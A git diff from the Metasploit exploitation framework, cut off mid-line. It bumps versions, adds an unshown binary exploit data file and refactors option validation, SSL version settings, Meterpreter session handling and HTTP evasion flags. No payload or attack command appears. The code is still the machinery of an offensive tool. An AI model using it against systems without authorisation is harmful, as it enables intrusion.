diff --git a/.mailmap b/.mailmap index 3dafb94713..7ab2a7147d 100644 --- a/.mailmap +++ b/.mailmap @@ -114,6 +114,7 @@ m-1-k-3 Michael Messner Meatballs1 Meatballs1 mubix Rob Fuller +net-ninja Steven Seeley nevdull77 Patrik Karlsson nmonkee nmonkee nullbind nullbind diff --git a/Gemfile.lock b/Gemfile.lock index 9baf553c05..4daa391b99 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.11.16) + metasploit-framework (4.11.18) actionpack (>= 4.0.9, < 4.1.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) @@ -13,7 +13,7 @@ PATH metasploit-concern metasploit-credential (= 1.1.0) metasploit-model (= 1.1.0) - metasploit-payloads (= 1.1.2) + metasploit-payloads (= 1.1.3) metasploit_data_models (= 1.3.0) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.1.2) + metasploit-payloads (1.1.3) metasploit_data_models (1.3.0) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/data/exploits/R7_2015_17/stream.raw b/data/exploits/R7_2015_17/stream.raw new file mode 100644 index 0000000000..aa17f76ea2 Binary files /dev/null and b/data/exploits/R7_2015_17/stream.raw differ diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index ed1dbf948b..ec28016010 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.11.16" + VERSION = "4.11.18" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb index 4878180280..ca31d16d87 100644 --- a/lib/msf/base/config.rb +++ b/lib/msf/base/config.rb @@ -27,7 +27,7 @@ class Config < Hash # @return [String] the base configuration directory def self.get_config_root - # Use MSFCFGDIR environment variable first. See feature request #5797 + # Use MSF_CFGROOT_CONFIG environment variable first. val = Rex::Compat.getenv('MSF_CFGROOT_CONFIG') if (val and File.directory?(val)) return val diff --git a/lib/msf/base/sessions/command_shell.rb b/lib/msf/base/sessions/command_shell.rb index d22ac17dbc..86b5ab5e68 100644 --- a/lib/msf/base/sessions/command_shell.rb +++ b/lib/msf/base/sessions/command_shell.rb @@ -216,7 +216,7 @@ class CommandShell end end - if (datastore['InitialAutoRunScript'] && datastore['InitialAutoRunScript'].empty? == false) + if datastore['InitialAutoRunScript'] && !datastore['InitialAutoRunScript'].empty? args = Shellwords.shellwords( datastore['InitialAutoRunScript'] ) print_status("Session ID #{sid} (#{tunnel_to_s}) processing InitialAutoRunScript '#{datastore['InitialAutoRunScript']}'") execute_script(args.shift, *args) diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index 789f25c801..b2863874e8 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb @@ -37,13 +37,13 @@ module MeterpreterOptions framework.sessions.schedule Proc.new { # Configure unicode encoding before loading stdapi - session.encode_unicode = ( datastore['EnableUnicodeEncoding'] ? true : false ) + session.encode_unicode = datastore['EnableUnicodeEncoding'] session.init_ui(self.user_input, self.user_output) valid = true - if datastore['AutoVerifySession'] == true + if datastore['AutoVerifySession'] if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i) print_error("Meterpreter session #{session.sid} is not valid and will be closed") valid = false @@ -52,7 +52,7 @@ module MeterpreterOptions if valid - if datastore['AutoLoadStdapi'] == true + if datastore['AutoLoadStdapi'] session.load_stdapi @@ -72,7 +72,7 @@ module MeterpreterOptions end [ 'InitialAutoRunScript', 'AutoRunScript' ].each do |key| - if (datastore[key].empty? == false) + if !datastore[key].empty? args = Shellwords.shellwords( datastore[key] ) print_status("Session ID #{session.sid} (#{session.tunnel_to_s}) processing #{key} '#{datastore[key]}'") session.execute_script(args.shift, *args) diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb index 05962133fc..d86a5f4dbd 100644 --- a/lib/msf/base/sessions/vncinject_options.rb +++ b/lib/msf/base/sessions/vncinject_options.rb @@ -84,7 +84,7 @@ module VncInjectOptions print_status("Local TCP relay started.") # If the AUTOVNC flag is set, launch VNC viewer. - if (datastore['AUTOVNC'] == true) + if datastore['AUTOVNC'] if (session.autovnc(datastore['ViewOnly'])) print_status("Launched vncviewer.") else diff --git a/lib/msf/core/auxiliary/crawler.rb b/lib/msf/core/auxiliary/crawler.rb index e52ff259de..4fd18ca9c3 100644 --- a/lib/msf/core/auxiliary/crawler.rb +++ b/lib/msf/core/auxiliary/crawler.rb @@ -44,7 +44,7 @@ module Auxiliary::HttpCrawler OptString.new('BasicAuthPass', [false, 'The HTTP password to specify for basic authentication']), OptString.new('HTTPAdditionalHeaders', [false, "A list of additional headers to send (separated by \\x01)"]), OptString.new('HTTPCookie', [false, "A HTTP cookie header to send with each request"]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL23', 'SSL3', 'TLS1']]), + Opt::SSLVersion ], self.class ) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index f4da1911e0..eeecd6ea38 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -13,6 +13,7 @@ class DataStore < Hash # Initializes the data store's internal state. # def initialize() + @options = Hash.new @imported = Hash.new @imported_by = Hash.new end @@ -26,6 +27,14 @@ class DataStore < Hash @imported[k] = false @imported_by[k] = nil + opt = @options[k] + unless opt.nil? + unless opt.valid?(v) + raise OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'#{['', ', try harder'].sample}"]) + end + v = opt.normalize(v) + end + super(k,v) end @@ -65,17 +74,11 @@ class DataStore < Hash # all of the supplied options # def import_options(options, imported_by = nil, overwrite = false) - options.each_option { |name, opt| - # If there's already a value defined for this option, then skip it - # and don't import it. - next if self.has_key?(name) and overwrite == false - - # If the option has a default value, import it, but only if the - # datastore doesn't already have a value set for it. - if ((opt.default != nil) and (overwrite or self[name] == nil)) - import_option(name, opt.default.to_s, true, imported_by) + options.each_option do |name, opt| + if self[name].nil? || overwrite + import_option(name, opt.default, true, imported_by, opt) end - } + end end # @@ -124,13 +127,14 @@ class DataStore < Hash # def import_options_from_hash(option_hash, imported = true, imported_by = nil) option_hash.each_pair { |key, val| - import_option(key, val.to_s, imported, imported_by) + import_option(key, val, imported, imported_by) } end - def import_option(key, val, imported=true, imported_by=nil) + def import_option(key, val, imported=true, imported_by=nil, option=nil) self.store(key, val) + @options[key] = option @imported[key] = imported @imported_by[key] = imported_by end diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 60d421b617..4e4ba8315c 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -163,14 +163,4 @@ class Msf::DBManager true end - - # Mainly, it's Ruby 1.9.1 that cause a lot of problems now, along with Ruby 1.8.6. - # Ruby 1.8.7 actually seems okay, but why tempt fate? Let's say 1.9.3 and beyond. - def warn_about_rubies - if ::RUBY_VERSION =~ /^1\.9\.[012]($|[^\d])/ - $stderr.puts "**************************************************************************************" - $stderr.puts "Metasploit requires at least Ruby 1.9.3. For an easy upgrade path, see https://rvm.io/" - $stderr.puts "**************************************************************************************" - end - end end diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb index 076107891e..c483d25358 100644 --- a/lib/msf/core/encoder.rb +++ b/lib/msf/core/encoder.rb @@ -537,7 +537,7 @@ protected # def find_context_key(buf, badchars, state) # Make sure our context information file is sane - if File.exists?(datastore['ContextInformationFile']) == false + if !File.exists?(datastore['ContextInformationFile']) raise NoKeyError, "A context information file must specified when using context encoding", caller end diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index 7e36ad1a80..f70884cdb3 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -1506,7 +1506,7 @@ protected # required when wanting to support context keyed encoding # def define_context_encoding_reqs(reqs) - return if datastore['EnableContextEncoding'] != true + return unless datastore['EnableContextEncoding'] # At present, we don't support any automatic methods of obtaining # context information. In the future, we might support obtaining diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 4bf9ca91c4..5b57e2e408 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -50,7 +50,7 @@ module Exploit::Remote::HttpClient OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]), + Opt::SSLVersion, OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]), OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']), OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']) @@ -85,7 +85,7 @@ module Exploit::Remote::HttpClient # # Remaining evasions to implement # -# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', 'false']), +# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', false]), # OptInt.new('HTTP::junk_pipeline', [true, 'Insert the specified number of junk pipeline requests', 0]), ], self.class ) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 6a101b9316..7eb5370411 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -32,9 +32,9 @@ module Exploit::Remote::HttpServer register_evasion_options( [ - OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', 'false']), - OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', 'false']), - OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', 'false']), + OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]), + OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]), + OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]), OptEnum.new('HTTP::compression', [false, 'Enable compression of HTTP responses via content encoding', 'none', ['none','gzip','deflate']]), OptString.new('HTTP::server_name', [true, 'Configures the Server header of all outgoing replies', 'Apache']) ], Exploit::Remote::HttpServer @@ -86,7 +86,7 @@ module Exploit::Remote::HttpServer # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!" end end @@ -530,16 +530,16 @@ module Exploit::Remote::HttpServer response.compress = datastore['HTTP::compression'] end - if (datastore['HTTP::chunked'] == true) + if datastore['HTTP::chunked'] response.auto_cl = false response.transfer_chunked = true end - if (datastore['HTTP::header_folding'] == true) + if datastore['HTTP::header_folding'] response.headers.fold = 1 end - if (datastore['HTTP::junk_headers'] == true) + if datastore['HTTP::junk_headers'] response.headers.junk_headers = 1 end diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 09f3f9487e..37c9a201d5 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -292,6 +292,8 @@ module Exploit::Remote::Postgres when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user + when "Fauth.c:L285:Rauth_failed" ; return {:preauth => "9.4.1-5"} # Bad creds, good database + when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host # Windows diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index 1f6da0ecf5..466f03281c 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -588,7 +588,7 @@ module Msf if profile.nil? print_status("Browsing directly to the exploit URL is forbidden.") send_not_found(cli) - elsif profile[:tried] and datastore['Retries'] == false + elsif profile[:tried] && !datastore['Retries'] print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.") send_not_found(cli) else diff --git a/lib/msf/core/exploit/smb/client.rb b/lib/msf/core/exploit/smb/client.rb index b104b9e48a..df006885f7 100644 --- a/lib/msf/core/exploit/smb/client.rb +++ b/lib/msf/core/exploit/smb/client.rb @@ -64,7 +64,7 @@ module Msf register_options( [ Opt::RHOST, - OptInt.new('RPORT', [ true, 'Set the SMB service port', 445]) + OptPort.new('RPORT', [ true, 'The SMB service port', 445]) ], Msf::Exploit::Remote::SMB::Client) register_autofilter_ports([ 139, 445]) diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb index f8c9055f30..265bea4ac5 100644 --- a/lib/msf/core/exploit/sunrpc.rb +++ b/lib/msf/core/exploit/sunrpc.rb @@ -31,7 +31,7 @@ module Exploit::Remote::SunRPC register_evasion_options( [ - OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', 'false']), + OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', false]), ], Msf::Exploit::Remote::SunRPC ) @@ -65,7 +65,7 @@ module Exploit::Remote::SunRPC } ) - if datastore['ONCRPC::tcp_request_fragmentation'] == true + if datastore['ONCRPC::tcp_request_fragmentation'] self.rpcobj.should_fragment = 1 end diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index cfbdfe98a9..ec70f4ff4a 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -64,7 +64,7 @@ module Exploit::Remote::Tcp register_advanced_options( [ OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL/TLS to be used (TLS and SSL23 are auto-negotiate)', 'TLS1', ['SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]), + Opt::SSLVersion, OptEnum.new('SSLVerifyMode', [ false, 'SSL verification method', 'PEER', %W{CLIENT_ONCE FAIL_IF_NO_PEER_CERT NONE PEER}]), OptString.new('SSLCipher', [ false, 'String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"']), Opt::Proxies, diff --git a/lib/msf/core/exploit/tcp_server.rb b/lib/msf/core/exploit/tcp_server.rb index a86a7a2b25..b791465dfd 100644 --- a/lib/msf/core/exploit/tcp_server.rb +++ b/lib/msf/core/exploit/tcp_server.rb @@ -19,7 +19,6 @@ module Exploit::Remote::TcpServer [ OptBool.new('SSL', [ false, 'Negotiate SSL for incoming connections', false]), # SSLVersion is currently unsupported for TCP servers (only supported by clients at the moment) - # OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']]), OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']), OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]), OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index c8fd5db9cb..b8e797c8ec 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb @@ -38,14 +38,6 @@ class Framework Revision = "$Revision$" - # Repository information - RepoRevision = ::Msf::Util::SVN.revision - RepoUpdated = ::Msf::Util::SVN.updated - RepoUpdatedDays = ::Msf::Util::SVN.days_since_update - RepoUpdatedDaysNote = ::Msf::Util::SVN.last_updated_friendly - RepoUpdatedDate = ::Msf::Util::SVN.last_updated_date - RepoRoot = ::Msf::Util::SVN.root - # EICAR canary EICARCorrupted = ::Msf::Util::EXE.is_eicar_corrupted? diff --git a/lib/msf/core/module.rb b/lib/msf/core/module.rb index fda6eebe8c..fe39a459b3 100644 --- a/lib/msf/core/module.rb +++ b/lib/msf/core/module.rb @@ -266,11 +266,10 @@ class Module end # - # Returns true if this module is being debugged. The debug flag is set - # by setting datastore['DEBUG'] to 1|true|yes + # Returns true if this module is being debugged. # def debugging? - (datastore['DEBUG'] || '') =~ /^(1|t|y)/i + datastore['DEBUG'] end # diff --git a/lib/msf/core/module/deprecated.rb b/lib/msf/core/module/deprecated.rb index 2879223d2f..64c846058b 100644 --- a/lib/msf/core/module/deprecated.rb +++ b/lib/msf/core/module/deprecated.rb @@ -60,15 +60,15 @@ module Msf::Module::Deprecated # # @return [void] def print_deprecation_warning - print_warning("*"*72) - print_warning("*%red"+"The module #{refname} is deprecated!".center(70)+"%clr*") + print_warning("*"*90) + print_warning("*%red"+"The module #{refname} is deprecated!".center(88)+"%clr*") if deprecation_date - print_warning("*"+"It will be removed on or about #{deprecation_date}".center(70)+"*") + print_warning("*"+"It will be removed on or about #{deprecation_date}".center(88)+"*") end if replacement_module - print_warning("*"+"Use #{replacement_module} instead".center(70)+"*") + print_warning("*"+"Use #{replacement_module} instead".center(88)+"*") end - print_warning("*"*72) + print_warning("*"*90) end def init_ui(input = nil, output = nil) diff --git a/lib/msf/core/module/ui/message.rb b/lib/msf/core/module/ui/message.rb index bf4d228abc..c706a35702 100644 --- a/lib/msf/core/module/ui/message.rb +++ b/lib/msf/core/module/ui/message.rb @@ -14,9 +14,8 @@ module Msf::Module::UI::Message def print_prefix prefix = '' - if (datastore['TimestampOutput'] =~ /^(t|y|1)/i) || ( - framework && framework.datastore['TimestampOutput'] =~ /^(t|y|1)/i - ) + if datastore['TimestampOutput'] || + (framework && framework.datastore['TimestampOutput']) prefix << "[#{Time.now.strftime("%Y.%m.%d-%H:%M:%S")}] " xn ||= datastore['ExploitNumber'] diff --git a/lib/msf/core/module/ui/message/verbose.rb b/lib/msf/core/module/ui/message/verbose.rb index 1a8d0175b9..a47a7e8f11 100644 --- a/lib/msf/core/module/ui/message/verbose.rb +++ b/lib/msf/core/module/ui/message/verbose.rb @@ -1,21 +1,21 @@ module Msf::Module::UI::Message::Verbose # Verbose version of #print_error def vprint_error(msg='') - print_error(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_error(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_good def vprint_good(msg='') - print_good(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_good(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_status def vprint_status(msg='') - print_status(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_status(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end # Verbose version of #print_warning def vprint_warning(msg='') - print_warning(msg) if datastore['VERBOSE'] || framework.datastore['VERBOSE'] + print_warning(msg) if datastore['VERBOSE'] || (!framework.nil? && framework.datastore['VERBOSE']) end end diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb index ed9740634a..0fe7794797 100644 --- a/lib/msf/core/module_manager.rb +++ b/lib/msf/core/module_manager.rb @@ -147,11 +147,6 @@ module Msf # @param klass [Class] The module class # @return [void] def auto_subscribe_module(klass) - # If auto-subscribe has been disabled - if (framework.datastore['DisableAutoSubscribe'] and - framework.datastore['DisableAutoSubscribe'] =~ /^(y|1|t)/) - return - end # If auto-subscription is enabled (which it is by default), figure out # if it subscribes to any particular interfaces. diff --git a/lib/msf/core/modules/loader/directory.rb b/lib/msf/core/modules/loader/directory.rb index 46f182e4f6..f311e4b767 100644 --- a/lib/msf/core/modules/loader/directory.rb +++ b/lib/msf/core/modules/loader/directory.rb @@ -32,10 +32,6 @@ class Msf::Modules::Loader::Directory < Msf::Modules::Loader::Base def each_module_reference_name(path, opts={}) whitelist = opts[:whitelist] || [] ::Dir.foreach(path) do |entry| - if entry.downcase == '.svn' - next - end - full_entry_path = ::File.join(path, entry) type = entry.singularize diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 3df70e099a..a1a53a2c87 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb @@ -51,6 +51,13 @@ module Msf Msf::OptPort.new(__method__.to_s, [ required, desc, default ]) end + # @return [OptEnum] + def self.SSLVersion + Msf::OptEnum.new('SSLVersion', [ false, + 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', 'Auto', + ['Auto', 'SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]) + end + # These are unused but remain for historical reasons class << self alias builtin_chost CHOST @@ -69,6 +76,7 @@ module Msf Proxies = Proxies() RHOST = RHOST() RPORT = RPORT() + SSLVersion = SSLVersion() end end diff --git a/lib/msf/core/opt_port.rb b/lib/msf/core/opt_port.rb index 295ae04538..97fb9db7ec 100644 --- a/lib/msf/core/opt_port.rb +++ b/lib/msf/core/opt_port.rb @@ -7,24 +7,17 @@ module Msf # Network port option. # ### -class OptPort < OptBase +class OptPort < OptInt def type return 'port' end - def normalize(value) - value.to_i - end - def valid?(value) - return false if empty_required_value?(value) - - if ((value != nil and value.to_s.empty? == false) and - ((value.to_s.match(/^\d+$/) == nil or value.to_i < 0 or value.to_i > 65535))) - return false + if !required? and value.to_s.empty? + super + else + super && normalize(value) <= 65535 && normalize(value) >= 0 end - - return super end end diff --git a/lib/msf/core/opt_raw.rb b/lib/msf/core/opt_raw.rb index 7da13693d9..1ecc37f290 100644 --- a/lib/msf/core/opt_raw.rb +++ b/lib/msf/core/opt_raw.rb @@ -13,7 +13,7 @@ class OptRaw < OptBase end def normalize(value) - if (value =~ /^file:(.*)/) + if (value.to_s =~ /^file:(.*)/) path = $1 begin value = File.read(path) diff --git a/lib/msf/core/opt_regexp.rb b/lib/msf/core/opt_regexp.rb index d7056dd63b..bb743077db 100644 --- a/lib/msf/core/opt_regexp.rb +++ b/lib/msf/core/opt_regexp.rb @@ -29,7 +29,7 @@ class OptRegexp < OptBase def normalize(value) return nil if value.nil? - return Regexp.compile(value) + return Regexp.compile(value.to_s) end def display_value(value) diff --git a/lib/msf/core/opt_string.rb b/lib/msf/core/opt_string.rb index 88818cb036..8b7499a940 100644 --- a/lib/msf/core/opt_string.rb +++ b/lib/msf/core/opt_string.rb @@ -13,7 +13,7 @@ class OptString < OptBase end def normalize(value) - if (value =~ /^file:(.*)/) + if (value.to_s =~ /^file:(.*)/) path = $1 begin value = File.read(path) diff --git a/lib/msf/core/payload/ruby.rb b/lib/msf/core/payload/ruby.rb index 80ff558804..e884fa1aca 100644 --- a/lib/msf/core/payload/ruby.rb +++ b/lib/msf/core/payload/ruby.rb @@ -10,7 +10,7 @@ module Msf::Payload::Ruby [ # Since space restrictions aren't really a problem, default this to # true. - Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", "true" ]) + Msf::OptBool.new('PrependFork', [ false, "Start the payload in its own process via fork or popen", true ]) ] ) end diff --git a/lib/msf/core/payload/windows/prepend_migrate.rb b/lib/msf/core/payload/windows/prepend_migrate.rb index 58ad420cfe..b6ccf75131 100644 --- a/lib/msf/core/payload/windows/prepend_migrate.rb +++ b/lib/msf/core/payload/windows/prepend_migrate.rb @@ -28,7 +28,7 @@ module Msf::Payload::Windows::PrependMigrate # for discussion. # def prepend_migrate? - !!(datastore['PrependMigrate'] && datastore['PrependMigrate'].to_s.downcase == 'true') + datastore['PrependMigrate'] end # diff --git a/lib/msf/sanity.rb b/lib/msf/sanity.rb index 0a5506fa03..dc5ef2696d 100644 --- a/lib/msf/sanity.rb +++ b/lib/msf/sanity.rb @@ -3,36 +3,6 @@ # Provides some sanity checks against the ruby build and version # -# Check for the broken pack/unpack in OS X 10.4.x -if ([1].pack('n') == "\x01\x00") - $stderr.puts "*** This ruby build has a broken pack/unpack implementation! " - - if (RUBY_PLATFORM =~ /darwin/) - $stderr.puts " Apple shipped a broken version of ruby with the 10.4.x " - $stderr.puts " release. Please install ruby from source, or use one of " - $stderr.puts " the free package managers to obtain a working ruby build." - end - - exit(0) -end - -# Check for ruby 1.8.2 as the minimal supported version -if (RUBY_VERSION =~ /^1\.[0-7]\./ or RUBY_VERSION =~ /^1\.8\.[0-1]$/) - $stderr.puts "*** This version of ruby is not supported, please upgrade to 1.8.7+" - exit(0) -end - -# Check for ruby 1.9.0 and throw a big nasty warning -if (RUBY_VERSION =~ /^1\.9\.0/) - $stderr.puts "*** Ruby 1.9.0 is not supported, please upgrade to Ruby 1.9.3 or newer." - exit(0) -end - -# Check for ruby 1.9.1 and throw a warning -if (RUBY_VERSION =~ /^1\.9\.1/) - $stderr.puts "*** Ruby 1.9.1 is not supported, please upgrade to Ruby 1.9.3 or newer." -end - if(RUBY_PLATFORM == 'java') require 'socket' s = Socket.new(::Socket::AF_INET, ::Socket::SOCK_STREAM, ::Socket::IPPROTO_TCP) @@ -56,56 +26,3 @@ rescue ::LoadError $stderr.puts "*** The ruby-openssl library is not installed, many features will be disabled!" $stderr.puts "*** Examples: Meterpreter, SSL Sockets, SMB/NTLM Authentication, and more" end - - -# -# Check for the ugly 1.8.7 short-named constants bug -# - -class ConstBugTestA - Const = 'A' - def test - Const == 'A' - end -end - -ConstBugTestC = ConstBugTestA.dup - -class ConstBugTestB < ConstBugTestC - Const = 'B' -end - -def ruby_187_const_bug - bugged = false - - begin - ConstBugTestA.new.test() - ConstBugTestB.new.test() - rescue ::NameError - bugged = true - end - - bugged -end - -if(ruby_187_const_bug()) - $stderr.puts "" - $stderr.puts "***********************************************************************" - $stderr.puts "*** *" - $stderr.puts "*** This version of the Ruby interpreter contains a serious bug *" - $stderr.puts "*** related to short-named constants, we strongly recommend that you *" - $stderr.puts "*** switch to a fixed version. Unfortunately, some Linux distros have *" - $stderr.puts "*** backported the buggy patch into 1.8.6, so you may need to contact *" - $stderr.puts "*** your vendor and ask them to review the URL below. *" - $stderr.puts "*** *" - $stderr.puts "*** Alternatively, you can download, build, and install the latest *" - $stderr.puts "*** stable snapshot of Ruby from the following URL: *" - $stderr.puts "*** - http://www.ruby-lang.org/ *" - $stderr.puts "*** *" - $stderr.puts "*** For more information, please see the following URL: *" - $stderr.puts "*** - https://bugs.launchpad.net/bugs/282302 *" - $stderr.puts "*** *" - $stderr.puts "***********************************************************************" - $stderr.puts "" -end - diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 2c80579dee..c619956d06 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2178,10 +2178,15 @@ class Core return true end - if append - datastore[name] = datastore[name] + value - else - datastore[name] = value + begin + if append + datastore[name] = datastore[name] + value + else + datastore[name] = value + end + rescue OptionValidateError => e + print_error(e.message) + elog(e.message) end print_line("#{name} => #{datastore[name]}") @@ -2193,7 +2198,6 @@ class Core # @param str [String] the string currently being typed before tab was hit # @param words [Array] the previously completed words on the command line. words is always # at least 1 when tab completion has reached this stage since the command itself has been completed - def cmd_set_tabs(str, words) # A value has already been specified @@ -2837,16 +2841,8 @@ class Core # Returns the revision of the framework and console library # def cmd_version(*args) - svn_console_version = "$Revision: 15168 $" - svn_metasploit_version = Msf::Framework::Revision.match(/ (.+?) \$/)[1] rescue nil - if svn_metasploit_version - print_line("Framework: #{Msf::Framework::Version}.#{svn_metasploit_version}") - else - print_line("Framework: #{Msf::Framework::Version}") - end - print_line("Console : #{Msf::Framework::Version}.#{svn_console_version.match(/ (.+?) \$/)[1]}") - - return true + print_line("Framework: #{Msf::Framework::Version}") + print_line("Console : #{Msf::Framework::Version}") end def cmd_grep_help @@ -3523,7 +3519,7 @@ class Core next if not o # handle a search string, search deep - if( + if ( not regex or o.name.match(regex) or o.description.match(regex) or @@ -3537,7 +3533,7 @@ class Core mod_opt_keys = o.options.keys.map { |x| x.downcase } opts.each do |opt,val| - if mod_opt_keys.include?(opt.downcase) == false or (val != nil and o.datastore[opt] != val) + if !mod_opt_keys.include?(opt.downcase) || (val != nil && o.datastore[opt] != val) show = false end end diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index ea7be2c617..fac610ed38 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -154,8 +154,7 @@ class Exploit else # If we didn't run a payload handler for this exploit it doesn't # make sense to complain to the user that we didn't get a session - disable_handler = /^true$/i === mod.datastore["DisablePayloadHandler"] ? true : false - unless disable_handler + unless mod.datastore["DisablePayloadHandler"] fail_msg = 'Exploit completed, but no session was created.' print_status(fail_msg) begin diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index ecb3ce61b4..e73eb55724 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -139,13 +139,13 @@ class 